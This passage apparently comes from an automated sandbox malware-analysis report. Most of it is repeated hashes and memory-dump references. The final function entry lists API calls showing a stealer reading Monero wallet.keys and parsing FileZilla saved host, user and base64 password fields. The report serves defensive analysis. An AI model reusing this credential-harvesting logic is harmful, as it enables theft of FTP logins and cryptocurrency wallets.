                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab6887dd2e5bfb9f6db07980e1272e659eaa959a4fbf0dc9897fd552fd1aa02e
                                        • Instruction ID: 482c90724ab224c32c5fc8a9eb22e38c2890dc5425c3c2149fe8d877aea8471f
                                        • Opcode Fuzzy Hash: ab6887dd2e5bfb9f6db07980e1272e659eaa959a4fbf0dc9897fd552fd1aa02e
                                        • Instruction Fuzzy Hash: A051D4F3E081109BE305AE29DC4576AF7E6EBA4720F1A853DDBC993384E935581586C2
                                        Function 00B5AD98 Relevance: .2, Instructions: 179COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8961ff7bc2a07ea00eda445e9511e3f42d431d4dd9651f8da9f9b8a2367b6825
                                        • Instruction ID: f48ebdb974f8e3f95fa9738ad92572057bf3821e1dd398269625f9f3391a599f
                                        • Opcode Fuzzy Hash: 8961ff7bc2a07ea00eda445e9511e3f42d431d4dd9651f8da9f9b8a2367b6825
                                        • Instruction Fuzzy Hash: 1D5176F3A182045BF3482E39DC8937AB7D6EB90310F1A423DDB89C77C4E83998048246
                                        Function 00B064D7 Relevance: .2, Instructions: 174COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f959a92b4dc0fbac29753da274bd9631a9c4240aa03cbbde59ecd42e1d91d15c
                                        • Instruction ID: d0332b57bfaaa2d9e4fe9fecdff56dcb8321f1abf1644cba4502f11d70837e7c
                                        • Opcode Fuzzy Hash: f959a92b4dc0fbac29753da274bd9631a9c4240aa03cbbde59ecd42e1d91d15c
                                        • Instruction Fuzzy Hash: E8510AF3D046109BF3056E28DC447A6B6D7DBD4325F2B853DDA88D3B84E9798D0542C6
                                        Function 00B4883B Relevance: .2, Instructions: 154COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c6c1d664fe67f1f39d699a8d9bb8a642f34cc1e1dff92e8b7299cb68bcd444f
                                        • Instruction ID: 0817dbf4f4725c08ed1e5bf63c6482a33bb9629abf1a292d5c51bc21ecaca048
                                        • Opcode Fuzzy Hash: 7c6c1d664fe67f1f39d699a8d9bb8a642f34cc1e1dff92e8b7299cb68bcd444f
                                        • Instruction Fuzzy Hash: C04135F3A08210ABE3146E69DC857ABFBDAEB98321F1B093DDB84D3740E575580083D6
                                        Function 00EC3000 Relevance: .1, Instructions: 140COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 076791a192dcb2b58a70085ff01abaa2ecf333f356fe7bd0ba1a0190c18900f5
                                        • Instruction ID: 993dffeb8c0a1afd88e552ee0a79c6d92512dfdd28725dc10a21f4260b00c72e
                                        • Opcode Fuzzy Hash: 076791a192dcb2b58a70085ff01abaa2ecf333f356fe7bd0ba1a0190c18900f5
                                        • Instruction Fuzzy Hash: 21419AB390C310AFE705BF29D84562AFBE4EF91321F1A482DE6C587241E6749881CB97
                                        Function 00BB4B4E Relevance: .1, Instructions: 140COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f34674c820bfa66f1fd75238b65572e503627a064bfa68cdd852f5691938def5
                                        • Instruction ID: b3770e8cfbca96ef162cb8e4e4905f36254933e35c7e89ce1d4ca2f877f5a936
                                        • Opcode Fuzzy Hash: f34674c820bfa66f1fd75238b65572e503627a064bfa68cdd852f5691938def5
                                        • Instruction Fuzzy Hash: C241E4F3A081109FE344AE28DC4577AB7D6EBD4320F1A853DE7D583784E939580487D6
                                        Function 00B70198 Relevance: .1, Instructions: 136COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5181c4cde81048769bcda19ef9c76a76e952292a41d82d3ec533faf8f42f4947
                                        • Instruction ID: 2e495c8c93e751108fcd86e9c1b0cae2a87180b42304657866fc347d47704301
                                        • Opcode Fuzzy Hash: 5181c4cde81048769bcda19ef9c76a76e952292a41d82d3ec533faf8f42f4947
                                        • Instruction Fuzzy Hash: 1F4148F3A082045BE3146A1DEC46B6AF7D5EBD0620F2E053DDFD497380E97AA9558382
                                        Function 00826799 Relevance: .1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction ID: 42f08c4b90acee2f6298896bd4160bf577d537417592666e5969ee2cd2e78434
                                        • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction Fuzzy Hash: B7516B72E09BD98AC7058B7944502EEBFB26FE6200F1E829DC4985B382D23556C9C3E5
                                        Function 00C81315 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 518c2aecf6c44834efc35504ed1ffc61909674d0ac6245b2483b5a3d44269fdc
                                        • Instruction ID: 4b79b3a2e539c21578a177f911bff68d497f53153ade6d43f4b828e6c0b124a1
                                        • Opcode Fuzzy Hash: 518c2aecf6c44834efc35504ed1ffc61909674d0ac6245b2483b5a3d44269fdc
                                        • Instruction Fuzzy Hash: FE2128B250C308EFE319BF19DC81AAAFBE5FF58710F11491DEAD583250EB3168109A5B
                                        Function 007F75A8 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                        • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                        • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                        • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                        Function 007C9AA0 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        Function 007C03B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007C8F9B
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007BA13C
                                          • Part of subcall function 007BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007BA161
                                          • Part of subcall function 007BA110: LocalAlloc.KERNEL32(00000040,?), ref: 007BA181
                                          • Part of subcall function 007BA110: ReadFile.KERNEL32(000000FF,?,00000000,007B148F,00000000), ref: 007BA1AA
                                          • Part of subcall function 007BA110: LocalFree.KERNEL32(007B148F), ref: 007BA1E0
                                          • Part of subcall function 007BA110: CloseHandle.KERNEL32(000000FF), ref: 007BA1EA
                                          • Part of subcall function 007C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007C8FE2
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,007D0DBF,007D0DBE,007D0DBB,007D0DBA), ref: 007C04C2
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C04C9
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 007C04E5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C04F3
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 007C052F
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C053D
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 007C0579
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C0587
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 007C05C3
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C05D5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C0662
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C067A
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C0692
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007D0DB7), ref: 007C06AA
                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 007C06C2
                                        • lstrcat.KERNEL32(?,profile: null), ref: 007C06D1
                                        • lstrcat.KERNEL32(?,url: ), ref: 007C06E0
